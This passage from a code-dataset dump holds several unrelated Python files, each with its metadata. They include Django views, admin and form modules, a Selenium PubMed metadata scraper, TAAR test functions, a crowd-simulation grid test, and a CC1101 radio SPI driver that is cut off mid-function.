available_objects]\n assert \"{}{}.json\".format(prefix, base_filename) in keys\n date_filename = \"{}{}20171106.json\".format(prefix, base_filename)\n assert date_filename in keys\n\n\n@mock_s3\ndef test_load_amo_external_whitelist():\n conn = boto3.resource(\"s3\", region_name=\"us-west-2\")\n conn.create_bucket(\n Bucket=taar_utils.AMO_DUMP_BUCKET,\n CreateBucketConfiguration={\n \"LocationConstraint\": \"us-west-2\",\n },\n )\n\n # Make sure that whitelist loading fails before mocking the S3 file.\n EXCEPTION_MSG = \"Empty AMO whitelist detected\"\n with pytest.raises(RuntimeError) as excinfo:\n taar_utils.load_amo_external_whitelist()\n\n assert EXCEPTION_MSG in str(excinfo.value)\n\n # Store an empty file and verify that an exception is raised.\n conn.Object(taar_utils.AMO_DUMP_BUCKET, key=taar_utils.AMO_WHITELIST_KEY).put(\n Body=json.dumps({})\n )\n\n with pytest.raises(RuntimeError) as excinfo:\n taar_utils.load_amo_external_whitelist()\n\n assert EXCEPTION_MSG in str(excinfo.value)\n\n # Store the data in the mocked bucket.\n conn.Object(taar_utils.AMO_DUMP_BUCKET, key=taar_utils.AMO_WHITELIST_KEY).put(\n Body=json.dumps(FAKE_AMO_DUMP)\n )\n\n # Check that the web_extension item is still present\n # and the legacy addon is absent.\n whitelist = taar_utils.load_amo_external_whitelist()\n assert \"this_guid_can_not_be_in_amo\" not in whitelist\n\n # Verify that the legacy addon was removed while the\n # web_extension compatible addon is still present.\n assert \"test-guid-0001\" in whitelist\n assert \"test-guid-0002\" not in whitelist\n\n\ndef test_telemetry_hash():\n \"\"\"\n A JS snippet that will run in the Browser Toolbox is:\n\n let byteArr = new TextEncoder().encode(\"33c5c416-c57d-4eb7-bf58-beaf97a40332\")\n const CryptoHash = Components.Constructor(\"@mozilla.org/security/hash;1\",\n \"nsICryptoHash\",\n \"initWithString\");\n let hash = new CryptoHash(\"sha256\");\n hash.update(byteArr, byteArr.length);\n let clientId = CommonUtils.bytesAsHex(hash.finish(false));\n \"54e760dc799b24c6edc1a02b200db9b07d51a96b7dc7d4ebcd1d86ee8728f420\"\n \"\"\"\n\n uuid = \"33c5c416-c57d-4eb7-bf58-beaf97a40332\"\n hashed_id = taar_utils.hash_telemetry_id(uuid)\n assert (\n hashed_id == \"54e760dc799b24c6edc1a02b200db9b07d51a96b7dc7d4ebcd1d86ee8728f420\"\n )\n","sub_path":"tests/test_taar_utils.py","file_name":"test_taar_utils.py","file_ext":"py","file_size_in_byte":6094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"641154290","text":"import environnement\r\nimport grille\r\n\r\n\"\"\"\r\nPetit programme de test de la classe Grille\r\n\"\"\"\r\n\r\nif __name__ == '__main__':\r\n noir = (0, 0, 0)\r\n rouge = (255, 0, 0)\r\n vert = (0, 255, 0)\r\n g = grille.Grille()\r\n p0 = environnement.Porte(vert, g)\r\n p1 = environnement.Porte(vert, g)\r\n p2 = environnement.Porte(vert, g)\r\n p3 = environnement.Porte(vert, g)\r\n v1 = environnement.Voyageur(rouge, [p0, p1], g)\r\n v2 = environnement.Voyageur(rouge, [p0, p1], g,0.5)\r\n v3 = environnement.Voyageur(rouge, [p2, p0, p3], g)\r\n listeVoyageurs = [v1, v2, v3]\r\n obs1 = environnement.Obstacle(noir, g)\r\n g.addObstacle([(0, 0), (5, 4), (5, 5), (6, 5), (9, 9), (8, 5), (9, 5), (10, 5), (11, 5)], obs1)\r\n g.addVoyageur((1, 1), v1)\r\n g.addVoyageur((2, 1), v2)\r\n g.addVoyageur((0, 9), v3)\r\n g.addPorte([(9, 3), (9, 4)], p0)\r\n g.addPorte([(7, 8), (7, 9)], p1)\r\n g.addPorte([(7, 5)], p2)\r\n g.addPorte([(11, 0)], p3)\r\n step = 0\r\n print(step)\r\n print(g)\r\n while 
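`test_telemetry_hash` above pins `taar_utils.hash_telemetry_id` to a SHA-256 hex digest of the UTF-8 client id. A plausible pure-Python counterpart, inferred from the test rather than copied from the actual mozetl implementation:

```python
import hashlib

def hash_telemetry_id(client_id: str) -> str:
    # SHA-256 over the UTF-8 bytes, rendered as lowercase hex (64 chars).
    return hashlib.sha256(client_id.encode("utf-8")).hexdigest()

print(hash_telemetry_id("33c5c416-c57d-4eb7-bf58-beaf97a40332"))
```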
list(filter(lambda v : v in g.getVoyageurs().values(),listeVoyageurs)) != []:\r\n step += 1\r\n g.deplacements()\r\n print(step)\r\n print(g)\r\n print(\"fini !\")","sub_path":"MouvementFoule/testGrille.py","file_name":"testGrille.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"351314723","text":"from django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView#class_based_view 汎用ビュー\n\nfrom .models import *\n\nfrom .forms import PostForm\n\n\n# Create your views here.\n\ndef index(request):\n memos = Memo.objects.all()\n params = {\n 'memos': memos\n }\n return render(request, 'index.html', params)#renderメソッドの第三引数に変数(辞書型)を入れることで、templateのhtmlファイルに使う変数を渡せる\n\n\ndef post(request):\n form = PostForm(request.POST, instance=Memo())\n if form.is_valid(): #validateで検証という英単語だから、formの内容が有効かどうかを観察するためのis_valid\n form.save() #formの保存\n else:\n print(form.errors)\n\n return redirect(to='/')\n\n","sub_path":"django_dotpro/django_app/memo_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"132264824","text":"from django.contrib import admin\nfrom .models import Car, Insurance, Tax, TechnicalCheckIn, Service\n\n\nclass CarAdmin(admin.ModelAdmin):\n list_display = ['name',\n 'firm',\n 'power',\n 'cylinder',\n 'fuel_consumption',\n 'fuel_type',\n 'registration_number',\n 'chassis']\n\n\nadmin.site.register(Car, CarAdmin)\n\n\nclass InsuranceAdmin(admin.ModelAdmin):\n list_display = ['insurance_company',\n 'vehicle',\n 'policy_number',\n 'activation_date',\n 'expiration_date',\n 'prime']\n\n\nadmin.site.register(Insurance, InsuranceAdmin)\n\n\nclass TaxAdmin(admin.ModelAdmin):\n list_display = ['vehicle',\n 'tax_amount',\n 'date_of_tax_payment',\n 'next_due_date',]\n\n\nadmin.site.register(Tax, TaxAdmin)\n\n\nclass TechnicalCheckInAdmin(admin.ModelAdmin):\n list_display = ['vehicle',\n 'check_in_number',\n 'comment',\n 'date_of_checkIn',\n 'date_of_next_checkIn',\n 'cost_of_checkIn']\n\n\nadmin.site.register(TechnicalCheckIn, TechnicalCheckInAdmin)\n\n\nclass ServiceAdmin(admin.ModelAdmin):\n list_display = ['vehicle',\n 'service_supplier',\n 'order_id',\n 'category',\n 'date_of_service',\n 'next_date',\n 'cost_of_service',\n 'cost_of_parts']\n\n\nadmin.site.register(Service, ServiceAdmin)\n\n\n\n\n","sub_path":"fleet/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"240407851","text":"# Website we want to scrape is: https://www.verizonwireless.com/smartphones/samsung-galaxy-s7/\n# The documentatio of selenium is here: http://selenium-python.readthedocs.io/index.html\n\n# Please follow the instructions below to setup the environment of selenium\n# Step #1\n# Windows users: download the chromedriver from here: https://chromedriver.storage.googleapis.com/index.html?path=2.30/\n# Mac users: Install homebrew: http://brew.sh/\n#\t\t\t Then run 'brew install chromedriver' on the terminal\n#\n# Step #2\n# Windows users: open Anaconda prompt and switch to python3 environment. Then run 'conda install -c conda-forge selenium'\n# Mac users: open Terminal and switch to python3 environment. 
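The stop condition in the grid test above, `while list(filter(...)) != []`, materialises a full list on every step; `any()` expresses the same test lazily and reads closer to the intent:

```python
active = {(1, 1): "a", (2, 1): "b"}   # stand-in for g.getVoyageurs()
travellers = ["a", "c"]
still_moving = any(t in active.values() for t in travellers)
print(still_moving)  # True
```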
Then run 'conda install selenium'\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import Select\nimport time\nimport csv\n\n# Windows users need to specify the path to chrome driver you just downloaded.\n# driver = webdriver.Chrome('path\\to\\where\\you\\download\\the\\chromedriver')\n\ndriver = webdriver.Chrome()\n# input the search condition\nsearch1 = \"(((cancer[Title/Abstract]) AND \\\"journal article\\\"[Publication Type]) AND \\\n(\\\"2000\\\"[Date - Publication] : \\\"3000\\\"[Date - Publication])) AND mutation[Title/Abstract]\"\n\nsearch2 = \"((cancer[Title/Abstract] AND gene[Title/Abstract] AND mutation[Title/Abstract]) AND \\\n(\\\"2000\\\"[Date - Publication] : \\\"3000\\\"[Date - Publication]))\" \n\n# add to the search engineer\nurl = \"https://www.ncbi.nlm.nih.gov/pubmed/?term=\" + search2\ndriver.get(url)\n\n# driver.find_elements_by_xpath(\".//input[@type='radio' and @value='SRF']\")[0].click\ncsv_file = open('pubmed.csv', 'w')\nwriter = csv.writer(csv_file)\nwriter.writerow(['pmid', 'title', 'author', 'journal', 'form'])\n# need to add abstract and key word before scraping the pages\n\n# Page index used to keep track of where we are.\nindex = 1\nwhile index < 3: # True\n\ttry:\n\t\tprint(\"Scraping Page number \" + str(index))\n\t\tindex = index + 1\n\t\t# Find the device name\n\t\t# Check the documentation here: http://selenium-python.readthedocs.io/locating-elements.html\n\n\t\t# Find all the reviews. The find_elements function will return a list of selenium select elements.\n\t\treviews = driver.find_elements_by_xpath('//*[@class=\"rprt\"]')\n\n\t\tprint('=' * 50)\n\t\tprint(len(reviews))\n\t\tprint(reviews[0])\n\t\tprint('=' * 50)\n\n\n\n\t\t# To test the xpath, you can comment out the following code in the try statement and print the length of reviews.\n\t\t# Iterate through the list and find the details of each review.\n\t\tfor review in reviews:\n\t\t\t# Initialize an empty dictionary for each review\n\t\t\treview_dict = {}\n\t\t\t\n\t\t\t# Use Xpath to locate the title, content, username, date.\n\t\t\t# Once you locate the element, you can use 'element.text' to return its string.\n\t\t\t# To get the attribute instead of the text of each element, use 'element.get_attribute()'\n\n\n\t\t\t#title = review.find_element_by_xpath('.//div[@class=\"bv-content-title-container\"]//h4').text\n\n\t\t\tpmid = review.find_element_by_xpath('.//*[@class=\"rprtid\"]/dd').text\n\t\t\ttitle = review.find_element_by_xpath('.//*[@class=\"title\"]/a').text\n\t\t\tauthor = review.find_element_by_xpath('.//*[@class=\"desc\"]').text\n\t\t\tjournal = review.find_element_by_xpath('.//*[@class=\"details\"]/span').text\n\t\t\tform = review.find_element_by_xpath('.//*[@class=\"details\"]/span').get_attribute(\"class\")\n\t\t\tlink = 'https://www.ncbi.nlm.nih.gov/pubmed/' + pmid\n\n\t\t\treview_dict['pmid'] = pmid\n\t\t\treview_dict['title'] = title\t\n\t\t\treview_dict['author'] = author\t\n\t\t\treview_dict['journal'] = journal\t\n\t\t\treview_dict['form'] = form\n\t\t\treview_dict['link'] = link\n\n\t\t\twriter.writerow(review_dict.values())\t\n\t\t\t\n\n\t\t\t# Your code here\n\n\t\t# Locate the next button on the page. 
Then call 'button.click()' to really click it.\n\t\tbutton = driver.find_element_by_xpath('.//*[@class=\"active page_link next\"]')\n\t\tbutton.click()\n\t\ttime.sleep(10)\n\n\n\n\texcept Exception as e:\n\t\tprint(e)\n\t\tdriver.close()\n\t\tbreak\n","sub_path":"data_selenium/pubmed/pubmed_final_title.py","file_name":"pubmed_final_title.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"29419703","text":"# coding: utf-8\ndef get_generic_list_view():\n return [\n {\n 'field_label': u'UUID',\n 'field_name': 'uuid',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Last update:',\n 'field_name': 'updated_at',\n 'field_type': 'date_time'\n },\n {\n 'field_label': u'Deleted?',\n 'field_name': 'is_deleted',\n 'field_type': 'boolean'\n },\n {\n 'field_label': u'Process completed?',\n 'field_name': 'process_completed',\n 'field_type': 'boolean'\n },\n {\n 'field_label': u'Must reprocess?',\n 'field_name': 'must_reprocess',\n 'field_type': 'boolean'\n },\n ]\n\n\ndef get_log_columns_list_view():\n return [\n {\n 'field_label': u'Timestamp',\n 'field_name': 'time',\n 'field_type': 'date_time'\n },\n {\n 'field_label': u'Name',\n 'field_name': 'name',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Function',\n 'field_name': 'funcName',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Message',\n 'field_name': 'message',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Line',\n 'field_name': 'lineno',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Level',\n 'field_name': 'levelname',\n 'field_type': 'string'\n },\n ]\n\n\ndef get_log_filters_list_view():\n return [\n {\n 'field_label': u'Timestamp',\n 'field_name': 'time',\n 'field_type': 'date_time'\n },\n {\n 'field_label': u'Name',\n 'field_name': 'name',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Function',\n 'field_name': 'funcName',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Message',\n 'field_name': 'message',\n 'field_type': 'string'\n },\n {\n 'field_label': u'Level',\n 'field_name': 'levelname',\n 'field_type': 'choices',\n 'field_options': (\n ('DEBUG', 'DEBUG'),\n ('INFO', 'INFO'),\n ('WARNING', 'WARNING'),\n ('ERROR', 'ERROR'),\n ('CRITICAL', 'CRITICAL'),\n )\n },\n ]\n\n\ndef get_collection_list_view():\n list = get_generic_list_view()\n\n list.insert(1, {\n 'field_label': u'Acrônimo',\n 'field_name': 'acronym',\n 'field_type': 'string'\n })\n\n list.insert(2, {\n 'field_label': u'Nome',\n 'field_name': 'name',\n 'field_type': 'string'\n })\n return list\n\n\ndef get_journal_list_view():\n list = get_generic_list_view()\n\n list.insert(1, {\n 'field_label': u'ISSN',\n 'field_name': 'code',\n 'field_type': 'string'\n })\n return list\n\n\ndef get_issue_list_view():\n list = get_generic_list_view()\n\n list.insert(1, {\n 'field_label': u'PID',\n 'field_name': 'code',\n 'field_type': 'string'\n })\n return list\n\n\ndef get_article_list_view():\n list = get_generic_list_view()\n\n list.insert(1, {\n 'field_label': u'PID',\n 'field_name': 'code',\n 'field_type': 'string'\n })\n return list\n\n\ndef get_press_release_list_view():\n return get_generic_list_view()\n","sub_path":"opac_proc/web/helpers/list_generator.py","file_name":"list_generator.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"500037181","text":"\"\"\"Product class.\"\"\"\n\n\nclass Product:\n def __init__(self, name=\"\", price=0.0, 
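The PubMed scraper above imports `WebDriverWait` and `expected_conditions` but paginates with a fixed `time.sleep(10)`. An explicit wait is faster and less flaky; a hedged sketch reusing the script's own XPath:

```python
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

def click_next(driver, timeout=10):
    # Blocks until the pager button is clickable, then clicks it.
    button = WebDriverWait(driver, timeout).until(
        EC.element_to_be_clickable((By.XPATH, '//*[@class="active page_link next"]'))
    )
    button.click()
```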
is_on_sale=False):\n self.name = name\n self.price = price\n self.is_on_sale = is_on_sale\n\n def __str__(self):\n on_sale_string = \"\"\n if self.is_on_sale:\n on_sale_string = \" (on sale!)\"\n return \"{} ${:.2f}{}\".format(self.name, self.price, on_sale_string)\n\n def __repr__(self):\n return str(self)\n\n\nif __name__ == '__main__':\n print(\"I'm in product.py\")\n products = [Product(\"Phone\", 340, False), Product(\"PC\", 1420.95, True), Product(\"Plant\", 24.5, True)]\n on_sale_products = [product for product in products if product.is_on_sale]\n print(on_sale_products)\n","sub_path":"week_067/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"593033067","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.forms import (\n TextInput,\n CharField,\n HiddenInput,\n Textarea)\n\nfrom django.core.exceptions import ValidationError\n\nfrom availableworks.core.forms import AWBaseModelForm\nfrom availableworks.core.widgets import CustomSelectWidget\nfrom availableworks.core.models.work import Work\n\n\nclass AccountAddWorkForm(AWBaseModelForm):\n\n class Meta:\n model = Work\n\n fields = (\n 'owner',\n 'title',\n 'original_artist',\n 'primary_category',\n 'secondary_category',\n 'width',\n 'length',\n 'depth',\n 'weight',\n 'signed',\n 'year_created',\n 'total_stock',\n 'price',\n 'description',\n 'shipping_area',\n 'handling_time',\n 'domestic_shipping_cost_est',\n 'intl_shipping_cost_est',\n 'is_retrievable')\n\n labels = {\n 'primary_category': 'Primary Medium',\n 'total_stock': 'Quantity You\\'ll Sell',\n 'is_retrievable': 'Buyer(s) Can Pick Up',\n 'price': 'Item Price (USD)'}\n\n help_texts = {\n 'title': '150 characters left',\n 'original_artist': '80 characters left',\n 'secondary_category': 'Optional 2nd Medium',\n 'width': 'Width',\n 'length': 'Length',\n 'depth': 'Depth',\n 'year_created': 'Example: 2004',\n 'total_stock': 'Example: 3, must be 1 or greater.',\n 'price': 'Example: 45.00 (include cents)',\n 'description': '300 characters remaining',\n 'shipping_area': 'Where will you send it?',\n 'handling_time': 'Handling time needed?',\n 'domestic_shipping_cost_est': 'Domestic',\n 'intl_shipping_cost_est': 'International',\n 'is_retrievable': 'If marked \"Yes\", you will need to message the buyer your address.'}\n\n widgets = {\n 'owner': HiddenInput,\n 'primary_category': CustomSelectWidget,\n 'secondary_category': CustomSelectWidget,\n 'width': TextInput,\n 'length': TextInput,\n 'depth': TextInput,\n 'weight': TextInput,\n 'signed': CustomSelectWidget,\n 'year_created': TextInput,\n 'total_stock': TextInput,\n 'price': TextInput,\n 'shipping_area': CustomSelectWidget,\n 'handling_time': CustomSelectWidget,\n 'domestic_shipping_cost_est': TextInput,\n 'intl_shipping_cost_est': TextInput,\n 'is_retrievable': CustomSelectWidget}\n\n def clean(self):\n cleaned = super(AWBaseModelForm, self).clean()\n\n if cleaned['shipping_area'] == Work.SHIPPING_AREA_GLOBAL:\n if not cleaned['intl_shipping_cost_est']:\n self._errors['intl_shipping_cost_est'] = self.error_class(['Required outside US.'])\n\n return cleaned\n\nclass AccountEditWorkForm(AccountAddWorkForm):\n pass\n","sub_path":"availableworks/account/forms/works.py","file_name":"works.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"649985842","text":"from registers import *\nfrom config import 
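`Product` above is mostly boilerplate that `dataclasses` can generate; a sketch keeping the custom `__str__` for the "(on sale!)" suffix:

```python
from dataclasses import dataclass

@dataclass
class Product:
    name: str = ""
    price: float = 0.0
    is_on_sale: bool = False

    def __str__(self) -> str:
        suffix = " (on sale!)" if self.is_on_sale else ""
        return f"{self.name} ${self.price:.2f}{suffix}"

print(Product("Plant", 24.5, True))  # Plant $24.50 (on sale!)
```

Note that the generated `__repr__` differs from the original class, which aliased `__repr__` to `__str__`.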
DEFAULT_CONFIG, DEFAULT_PA_TABLE\nfrom time import sleep\nfrom packets import AckPacket\nfrom packets import CounterPacket\nimport time\n\nSTATE_MASK = 0b01110000\nCHIP_RDY_MASK = 0b10000000\nFIFO_MASK = 0b00001111\n\nclass State(Enum):\n IDLE = 0b0000000\n RX = 0b0010000\n TX = 0b0100000\n FSTXON = 0b0110000\n CALIBRATE = 0b1000000\n SETTLING = 0b1010000\n RXFIFO_OVERFLOW = 0b1100000\n TXFIFO_UNDERFLOW = 0b1110000\n\nclass StatusByte(object):\n def __init__(self, status_byte):\n self.chip_ready = not (status_byte & CHIP_RDY_MASK == 0b10000000)\n self.state = State(status_byte & STATE_MASK)\n self.fifo = status_byte & FIFO_MASK\n\n def __str__(self):\n s = \"\"\n if (not self.chip_ready):\n s = \"CHIP NOT READY, \"\n s = s + \"State:\" + self.state.name\n s = s + \" Nr byte: >= \" + str(self.fifo)\n return s\n\ndef wreg(spi, reg: Register , val: int) -> StatusByte:\n \"\"\"\n Write via ``spi'' interface the value ``val'' into register with address ``reg''.\n\n Parameters\n ----------\n spi : spi object\n reg : register address\n val : value\n\n Returns\n -------\n out : state\n \"\"\"\n return StatusByte(spi.xfer2([reg.value, val])[-1])\n\ndef rreg(spi, reg: Register):\n \"\"\"\n Read register with address ``reg'' via ``spi'' interface.\n\n Parameters\n ----------\n spi : spi object\n reg: register address\n\n Returns\n -------\n out : register value\n\n \"\"\"\n # First byte contains the status byte while the second the register value\n # ([1]).\n return spi.xfer2([reg.value + Offset.READ_SINGLE.value, 0])[1]\n\ndef init(spi, cfg=DEFAULT_CONFIG, pa=DEFAULT_PA_TABLE) -> StatusByte:\n _ = reset(spi)\n _ = config(spi, cfg, pa)\n _ = flush_rx(spi)\n _ = flush_tx(spi)\n return status(spi)\n\ndef reset(spi) -> StatusByte:\n return StatusByte(spi.xfer2([Strobe.SRES.value])[0])\n\ndef config(spi, cfg=DEFAULT_CONFIG, pa=DEFAULT_PA_TABLE) -> StatusByte:\n _ = config_regs(spi)\n _ = config_pa_table(spi)\n return status(spi)\n\n\n\n\n\ndef config_regs(spi, cfg=DEFAULT_CONFIG) -> StatusByte:\n return StatusByte(spi.xfer2([x for k, v in cfg.items() for x in [k.value, v]])[-1])\n\ndef config_pa_table(spi, pa=DEFAULT_PA_TABLE) -> StatusByte:\n return StatusByte(spi.xfer2([Special.PATABLE.value + Offset.WRITE_BURST.value]\n + pa)[-1])\n\ndef status(spi) -> StatusByte:\n return StatusByte(spi.xfer2([Strobe.SNOP.value\n + Offset.READ_SINGLE.value])[0])\n\n\ndef status_tx(spi) -> StatusByte:\n return StatusByte(spi.xfer2([Strobe.SNOP.value + Offset.WRITE_SINGLE.value])[0])\n################################################################################\n# Strobe\n\ndef send_strobe(spi, cmd: Command) -> StatusByte:\n return StatusByte(spi.xfer2([cmd.value])[0])\n\ndef set_rx(spi) -> StatusByte:\n return send_strobe(spi, Strobe.SRX)\n\ndef set_tx(spi) -> StatusByte:\n return send_strobe(spi, Strobe.STX)\n\ndef set_idle(spi) -> StatusByte:\n return send_strobe(spi, Strobe.SIDLE)\n\ndef flush_rx(spi) -> StatusByte:\n return send_strobe(spi, Strobe.SFRX)\n\ndef flush_tx(spi) -> StatusByte:\n return send_strobe(spi, Strobe.SFTX)\n\ndef isRX(spi) -> bool:\n return status(spi).state == State.RX\n\ndef isTX(spi) -> bool:\n return status(spi).state == State.TX\n\ndef rssi(spi) -> int:\n rssi = rreg(spi, Status.RSSI)\n if (rssi >= 128):\n rssi = rssi - 256\n return rssi // 2 - 70\n\ndef enter_rx_mode(spi):\n while not isRX(spi):\n set_rx(spi)\n\ndef enter_tx_mode(spi):\n while not isTX(spi):\n set_tx(spi)\n\n\ndef tx_fifo_byte_count(spi):\n return spi.xfer2([0xFA, 0x00])[-1] \n\ndef rx_fifo_byte_count(spi):\n return 
spi.xfer2([0xFB, 0x00])[-1]\n\n\n###########################################################################\n# Transmission and reception.\n\ndef tx_data2fifo(spi, data):\n #map(lambda x: spi.xfer2([Special.FIFO.value, x]) ,data)\n return StatusByte(spi.xfer2([Special.FIFO.value\n + Offset.WRITE_BURST.value]\n + data)[-1])\n\n\n\n\ndef set_inf_pkt_mode(spi):\n pktctrl0_setting = rreg(spi, Config.PKTCTRL0)\n wreg(spi, Config.PKTCTRL0, ((pktctrl0_setting & 0xFC) | 0x02))\n #wreg(spi, Config.PKTCTRL0, 0x04)\n wreg(spi, Config.PKTCTRL1, 0x04)\n \ndef set_fix_pkt_mode(spi):\n pktctrl0_setting = rreg(spi, Config.PKTCTRL0)\n wreg(spi, Config.PKTCTRL0, (pktctrl0_setting & 0xFC))\n \n\ndef set_pkt_len(spi, length):\n wreg(spi, Config.PKTLEN, length)\n\n\n\n\ndef tx_sync_infinite(spi, pkt) -> bool: \n pkt_size = len(pkt) \n print(\"pkt size:\", pkt_size)\n print(\"mod:\", pkt_size % 256)\n\n flush_tx(spi);\n set_inf_pkt_mode(spi)\n set_pkt_len(spi, pkt_size % 256)\n \n \n \n bytes_sent = 0\n\n\n while len(pkt) > 255:\n while tx_fifo_byte_count(spi) > 2:\n sleep(0.0001)\n\n tx_data2fifo(spi, pkt[:30])\n \n enter_tx_mode(spi)\n \n pkt = pkt[30:] \n bytes_sent += 30\n while tx_fifo_byte_count(spi) > 2:\n sleep(0.0001)\n wreg(spi, Config.PKTCTRL0, 0x00)\n\n while len(pkt):\n while tx_fifo_byte_count(spi) > 2:\n sleep(0.0001)\n\n tx_data2fifo(spi, pkt[:30])\n pkt = pkt[30:]\n enter_tx_mode(spi)\n bytes_sent += len(pkt)\n \n while isTX(spi):\n sleep(0.0001)\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\ndef tx_sync(spi, gpio, pin, data) -> bool:\n wreg(spi, Config.PKTCTRL0, 0x05)\n wreg(spi, Config.PKTCTRL1, 0x08)\n\n t_poll = .001\n _ = set_idle(spi)\n _ = flush_tx(spi)\n sleep(.1)\n _ = tx_data2fifo(spi, data)\n enter_tx_mode(spi)\n\n # Wait for SYNC signal\n while gpio.input(pin) == 0:\n sleep(t_poll)\n while gpio.input(pin):\n sleep(t_poll)\n print(\"TRANSMITTED!\")\n return status(spi)\n\n\ndef rx_sync_counter(spi, gpio, pin, time_threshold):\n wreg(spi, Config.PKTCTRL0, 0x05)\n wreg(spi, Config.PKTCTRL1, 0x08)\n return rx_sync(spi, gpio, pin, CounterPacket.LENGTH.value, time_threshold)\n\ndef rx_sync_ack(spi, gpio, pin, time_threshold):\n wreg(spi, Config.PKTCTRL0, 0x05)\n wreg(spi, Config.PKTCTRL1, 0x08)\n return rx_sync(spi, gpio, pin, AckPacket.LENGTH.value, time_threshold)\n\ndef rx_fifo2data(spi, n):\n return spi.xfer2([Special.FIFO.value + Offset.READ_BURST.value] + ([0] * (n)))\n\ndef rx_sync_infinite(spi, gpio, pin, time_threshold):\n payload = []\n passed_time = 0\n set_inf_pkt_mode(spi)\n enter_rx_mode(spi)\n while gpio.input(pin) == 0:\n sleep(.001)\n passed_time += .001\n if passed_time >= time_threshold:\n print(\"timeout\")\n set_idle(spi)\n return -1\n while rx_fifo_byte_count(spi) > 4:\n sleep(0.0005)\n\n payload_len = rxfifo2data(spi, 2)\n address = rxfifo2data(spi, 1)\n pkt_type = rxfifo2data(spi, 1)\n\n bytes_left = payload_len\n \n set_pkt_len(spi, (payload_len + 4) % 256)\n\n while bytes_left > 255:\n while rx_fifo_byte_count() < 30:\n sleep(0.0005)\n\n rx_bytes_avail = rx_fifo_byte_count() - 1\n payload += rxfifo2data(spi, rx_bytes_avail)\n bytes_left -= rx_bytes_avail\n\n\n \n set_fix_pkt_mode(spi)\n \n while (bytes_left > 30):\n while rx_fifo_byte_count() < 30:\n sleep(0.0005)\n \n rx_bytes_avail = rx_fifo_byte_count() - 1\n payload += rxfifo2data(spi, rx_bytes_avail)\n bytes_left -= rx_bytes_avail\n\n while rx_fifo_byte_count() < bytes_left:\n sleep(0.0005)\n\n\n payload += rxfifo2data(spi, bytes_left)\n\n while rx_fifo_byte_count() < 2:\n sleep(0.0005)\n\n \n status_byte1 = 
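A hedged note on `rx_sync_infinite` above: it calls `rxfifo2data(...)` and a zero-argument `rx_fifo_byte_count()`, but the helpers defined in this module are `rx_fifo2data(spi, n)` and `rx_fifo_byte_count(spi)`, so those lines raise `NameError`/`TypeError` as written. A drain loop matching the real helper signatures (a repair sketch that assumes this module's helpers, not the original code):

```python
from time import sleep

def drain_rx_fifo(spi, bytes_left, chunk=30):
    """Read `bytes_left` payload bytes out of the RX FIFO in small chunks."""
    payload = []
    while bytes_left > 0:
        avail = min(rx_fifo_byte_count(spi) - 1, bytes_left, chunk)
        if avail <= 0:
            sleep(0.0005)  # FIFO not filled yet; poll, as the original loops do
            continue
        payload += rx_fifo2data(spi, avail)[1:]  # element [0] is the status byte
        bytes_left -= avail
    return payload
```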
\ndef rx_sync_infinite(spi, gpio, pin, time_threshold):\n    payload = []\n    passed_time = 0\n    set_inf_pkt_mode(spi)\n    enter_rx_mode(spi)\n    while gpio.input(pin) == 0:\n        sleep(.001)\n        passed_time += .001\n        if passed_time >= time_threshold:\n            print(\"timeout\")\n            set_idle(spi)\n            return -1\n    # Wait for the 4 header bytes: 2-byte payload length, address, type.\n    while rx_fifo_byte_count(spi) < 4:\n        sleep(0.0005)\n\n    # Each burst read returns the status byte first, so strip element 0.\n    len_bytes = rx_fifo2data(spi, 2)[1:]\n    # A big-endian length field is assumed here; swap if the sender packs it low byte first.\n    payload_len = (len_bytes[0] << 8) | len_bytes[1]\n    address = rx_fifo2data(spi, 1)[1]\n    pkt_type = rx_fifo2data(spi, 1)[1]\n\n    bytes_left = payload_len\n\n    set_pkt_len(spi, (payload_len + 4) % 256)\n\n    while bytes_left > 255:\n        while rx_fifo_byte_count(spi) < 30:\n            sleep(0.0005)\n\n        rx_bytes_avail = rx_fifo_byte_count(spi) - 1\n        payload += rx_fifo2data(spi, rx_bytes_avail)[1:]\n        bytes_left -= rx_bytes_avail\n\n    set_fix_pkt_mode(spi)\n\n    while bytes_left > 30:\n        while rx_fifo_byte_count(spi) < 30:\n            sleep(0.0005)\n\n        rx_bytes_avail = rx_fifo_byte_count(spi) - 1\n        payload += rx_fifo2data(spi, rx_bytes_avail)[1:]\n        bytes_left -= rx_bytes_avail\n\n    while rx_fifo_byte_count(spi) < bytes_left:\n        sleep(0.0005)\n\n    payload += rx_fifo2data(spi, bytes_left)[1:]\n\n    while rx_fifo_byte_count(spi) < 2:\n        sleep(0.0005)\n\n    status_byte1 = rx_fifo2data(spi, 1)[1]  # appended RSSI\n    status_byte2 = rx_fifo2data(spi, 1)[1]  